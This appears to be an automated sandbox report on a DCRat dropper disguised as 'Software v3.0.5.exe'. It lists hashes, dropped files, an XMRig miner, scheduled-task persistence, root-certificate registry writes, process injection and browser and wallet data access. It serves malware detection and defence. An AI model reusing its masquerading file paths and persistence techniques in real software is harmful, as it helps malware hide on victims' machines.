dcrat | c6c9d678a3313c5bb7fe71194a2a1e4d3ffca2f04252dd1983ba657cfe17320e

Analysis

max time kernel
101s
max time network
122s
platform
windows7_x64
resource
win7v20210408
submitted
22-07-2021 22:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Software v3.0.5.exe
Size

910KB
MD5

56d73f0b8c89094a9f0ad6277f042b3d
SHA1

6efe8b8257f030fdb63a069aad558b6282310a31
SHA256

c6c9d678a3313c5bb7fe71194a2a1e4d3ffca2f04252dd1983ba657cfe17320e
SHA512

6f003181b4118e421ec152f1297f7eb5f5e0b3276861c5ba8face20931aa75046dd95672f5120fc7f2acd65db69e0baaee0be7c3ed51a03ec3eab8b24c6a7379

Score

10^/10

dcrat xmrig infostealer miner rat spyware stealer

Malware Config

Signatures

DCrat 3 IoCs

DarkCrystalrat.

rat

Processes:

resource	yara_rule
\Users\Admin\AppData\Roaming\Dcr.exe	Dark_crystal_rat
C:\Users\Admin\AppData\Roaming\Dcr.exe	Dark_crystal_rat
C:\Users\Admin\AppData\Roaming\Dcr.exe	Dark_crystal_rat

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

DCRat Payload 8 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
\Users\Admin\AppData\Roaming\Dcr.exe	dcrat
C:\Users\Admin\AppData\Roaming\Dcr.exe	dcrat
C:\Users\Admin\AppData\Roaming\Dcr.exe	dcrat
\fonthostSvc\fonthostSvcIntodhcp.exe	dcrat
C:\fonthostSvc\fonthostSvcIntodhcp.exe	dcrat
C:\fonthostSvc\fonthostSvcIntodhcp.exe	dcrat
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe	dcrat
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe	dcrat

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1908-160-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral1/memory/1908-161-0x00000001402EB66C-mapping.dmp	xmrig
behavioral1/memory/1908-163-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Executes dropped EXE 9 IoCs

Processes:

Dcr.exeetc.exexmr.exefonthostSvcIntodhcp.execonhost.exeservices64.exeservices32.exesihost32.exesihost64.exe

pid	process
1728	Dcr.exe
1424	etc.exe
1952	xmr.exe
1308	fonthostSvcIntodhcp.exe
2000	conhost.exe
2036	services64.exe
2008	services32.exe
660	sihost32.exe
1928	sihost64.exe

Loads dropped DLL 8 IoCs

Processes:

Software v3.0.5.execmd.exexmr.exeetc.exeservices32.exeservices64.exe

pid process

1640 Software v3.0.5.exe
1640 Software v3.0.5.exe
1640 Software v3.0.5.exe
1676 cmd.exe
1952 xmr.exe
1424 etc.exe
2008 services32.exe
2036 services64.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

8 ipinfo.io
9 ipinfo.io

pid	process
1640	Software v3.0.5.exe
1640	Software v3.0.5.exe
1640	Software v3.0.5.exe
1676	cmd.exe
1952	xmr.exe
1424	etc.exe
2008	services32.exe
2036	services64.exe

flow	ioc
8	ipinfo.io
9	ipinfo.io

Drops file in System32 directory 12 IoCs

Processes:

fonthostSvcIntodhcp.exe

description	ioc	process
File created	C:\Windows\System32\capisp\69ddcba757bf72f7d36c464c71f42baab150b2b9	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\wbem\portabledevicetypes\24dbde2999530ef5fd907494bc374d663924116c	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\C_863\c5b4cb5e9653cce737f29f72ba880dd4c4bab27d	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\wbem\dot3\WmiPrvSE.exe	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\wbem\dot3\24dbde2999530ef5fd907494bc374d663924116c	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\chajei\886983d96e3d3e31032c679b2d4ea91b6c05afef	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\capisp\smss.exe	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\snmptrap\101b941d020240259ca4912829b53995ad543df6	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\chajei\csrss.exe	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\wbem\portabledevicetypes\WmiPrvSE.exe	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\C_863\services.exe	fonthostSvcIntodhcp.exe
File created	C:\Windows\System32\snmptrap\lsm.exe	fonthostSvcIntodhcp.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

services64.exe

description pid process target process

PID 2036 set thread context of 1908 2036 services64.exe explorer.exe

description	pid	process	target process
PID 2036 set thread context of 1908	2036	services64.exe	explorer.exe

Drops file in Program Files directory 5 IoCs

Processes:

fonthostSvcIntodhcp.exe

description	ioc	process
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\System.exe	fonthostSvcIntodhcp.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\System.exe	fonthostSvcIntodhcp.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\27d1bcfc3c54e0e44ea423ffd4ee81fe73670a2a	fonthostSvcIntodhcp.exe
File created	C:\Program Files\Windows Sidebar\Shared Gadgets\WMIADAP.exe	fonthostSvcIntodhcp.exe
File created	C:\Program Files\Windows Sidebar\Shared Gadgets\75a57c1bdf437c0c81ad56e81f43c7323ed35745	fonthostSvcIntodhcp.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1608	schtasks.exe
1616	schtasks.exe
1956	schtasks.exe
1924	schtasks.exe
1684	schtasks.exe
1148	schtasks.exe
1244	schtasks.exe
1860	schtasks.exe
1740	schtasks.exe
1152	schtasks.exe
1692	schtasks.exe
1312	schtasks.exe
1572	schtasks.exe
1916	schtasks.exe
1276	schtasks.exe

Modifies system certificate store 2 TTPs 12 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

services32.exeservices64.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	services32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	services32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	services64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	services64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	services64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	services64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	services32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	services64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	services64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b06010505080202200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	services32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	services64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	services32.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1632 PING.EXE

pid	process
1632	PING.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

fonthostSvcIntodhcp.execonhost.exexmr.exeetc.exeservices32.exeservices64.exe

pid	process
1308	fonthostSvcIntodhcp.exe
1308	fonthostSvcIntodhcp.exe
1308	fonthostSvcIntodhcp.exe
2000	conhost.exe
2000	conhost.exe
1952	xmr.exe
1424	etc.exe
2008	services32.exe
2036	services64.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

fonthostSvcIntodhcp.execonhost.exexmr.exeetc.exeservices32.exeservices64.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	1308	fonthostSvcIntodhcp.exe
Token: SeDebugPrivilege	2000	conhost.exe
Token: SeDebugPrivilege	1952	xmr.exe
Token: SeDebugPrivilege	1424	etc.exe
Token: SeDebugPrivilege	2008	services32.exe
Token: SeDebugPrivilege	2036	services64.exe
Token: SeLockMemoryPrivilege	1908	explorer.exe
Token: SeLockMemoryPrivilege	1908	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Software v3.0.5.exeDcr.exeWScript.execmd.exefonthostSvcIntodhcp.execmd.exe

description	pid	process	target process
PID 1640 wrote to memory of 1728	1640	Software v3.0.5.exe	Dcr.exe
PID 1640 wrote to memory of 1728	1640	Software v3.0.5.exe	Dcr.exe
PID 1640 wrote to memory of 1728	1640	Software v3.0.5.exe	Dcr.exe
PID 1640 wrote to memory of 1728	1640	Software v3.0.5.exe	Dcr.exe
PID 1640 wrote to memory of 1424	1640	Software v3.0.5.exe	etc.exe
PID 1640 wrote to memory of 1424	1640	Software v3.0.5.exe	etc.exe
PID 1640 wrote to memory of 1424	1640	Software v3.0.5.exe	etc.exe
PID 1640 wrote to memory of 1424	1640	Software v3.0.5.exe	etc.exe
PID 1640 wrote to memory of 1952	1640	Software v3.0.5.exe	xmr.exe
PID 1640 wrote to memory of 1952	1640	Software v3.0.5.exe	xmr.exe
PID 1640 wrote to memory of 1952	1640	Software v3.0.5.exe	xmr.exe
PID 1640 wrote to memory of 1952	1640	Software v3.0.5.exe	xmr.exe
PID 1728 wrote to memory of 1984	1728	Dcr.exe	WScript.exe
PID 1728 wrote to memory of 1984	1728	Dcr.exe	WScript.exe
